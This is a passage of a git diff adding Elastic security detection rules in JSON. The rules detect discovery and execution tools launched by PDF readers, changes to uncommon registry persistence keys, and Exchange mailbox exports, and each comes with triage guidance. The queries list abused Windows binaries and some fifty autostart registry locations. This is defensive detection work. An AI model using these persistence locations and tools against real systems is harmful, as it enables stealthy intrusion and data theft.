environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"AcroRd32.exe\",\n \"Acrobat.exe\",\n \"FoxitPhantomPDF.exe\",\n \"FoxitReader.exe\") and\n process.name : (\"arp.exe\", \"dsquery.exe\", \"dsget.exe\", \"gpresult.exe\", \"hostname.exe\", \"ipconfig.exe\", \"nbtstat.exe\",\n \"net.exe\", \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"ping.exe\", \"qprocess.exe\",\n \"quser.exe\", \"qwinsta.exe\", \"reg.exe\", \"sc.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\",\n \"whoami.exe\", \"bginfo.exe\", \"cdb.exe\", \"cmstp.exe\", \"csi.exe\", \"dnx.exe\", \"fsi.exe\", \"ieexec.exe\",\n \"iexpress.exe\", \"installutil.exe\", \"Microsoft.Workflow.Compiler.exe\", \"msbuild.exe\", \"mshta.exe\",\n \"msxsl.exe\", \"odbcconf.exe\", \"rcsi.exe\", \"regsvr32.exe\", \"xwizard.exe\", \"atbroker.exe\",\n \"forfiles.exe\", \"schtasks.exe\", \"regasm.exe\", \"regsvcs.exe\", \"cmd.exe\", \"cscript.exe\",\n \"powershell.exe\", \"pwsh.exe\", \"wmic.exe\", \"wscript.exe\", \"bitsadmin.exe\", \"certutil.exe\", \"ftp.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "53a26770-9cbd-40c5-8b57-61d01a325e14_110", + "type": "security-rule" +} \ No newline at end of 
file diff --git a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_106.json b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_106.json new file mode 100644 index 00000000000..38482fe15e2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_106.json 
@@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects changes to registry persistence keys that are not commonly used or modified by legitimate programs. This could be an indication of an adversary's attempt to persist in a stealthy manner.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Uncommon Registry Persistence Change", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n 
\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n 
\"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", + 
"references": [ + "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "54902e45-3467-49a4-8abc-529f2c8cfb80", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + }, + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.002", + "name": "Screensaver", + "reference": "https://attack.mitre.org/techniques/T1546/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timeline_id": 
"3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "54902e45-3467-49a4-8abc-529f2c8cfb80_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_107.json b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_107.json new file mode 100644 index 00000000000..e5dbfc3bfd3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_107.json 
@@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects changes to registry persistence keys that are not commonly used or modified by legitimate programs. This could be an indication of an adversary's attempt to persist in a stealthy manner.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Uncommon Registry Persistence Change", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n 
\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n 
\"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", + 
"references": [ + "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "54902e45-3467-49a4-8abc-529f2c8cfb80", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + }, + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.002", + "name": "Screensaver", + "reference": "https://attack.mitre.org/techniques/T1546/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timeline_id": 
"3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "54902e45-3467-49a4-8abc-529f2c8cfb80_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_108.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_108.json new file mode 100644 index 00000000000..ba1205854a6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_108.json 
@@ -0,0 +1,140 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information.", + "false_positives": [ + "Legitimate exchange system administration activity." + ], + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Exchange\\\\RemotePowerShell\\\\*" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\tmp_????????.???\\\\tmp_????????.???.ps?1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Windows\\\\TEMP\\\\tmp_????????.???\\\\tmp_????????.???.ps?1" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Exchange Mailbox Export via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Exchange Mailbox Export via PowerShell\n\nThe `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange.\nAttackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the export operation:\n - Identify the user account that performed the action and whether it should perform this kind of action.\n - Contact the account owner and confirm whether they are aware of this activity.\n - Check if this operation was approved and performed according to the organization's change management policy.\n - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests.\n - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that assigned the \"Mailbox Import Export\" privilege for abnormal activity.\n- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on a per-mailbox basis and can be part of a mass export.\n- If the operation was completed successfully:\n - Check if the file is on the path specified in the command.\n - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges of users with the \"Mailbox Import Export\" privilege to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : \"New-MailboxExportRequest\"\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps", + "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": 
"event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "54a81f68-5f2a-421e-8eed-f888278bb712", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + }, + { + "id": "T1114", + "name": "Email Collection", + "reference": 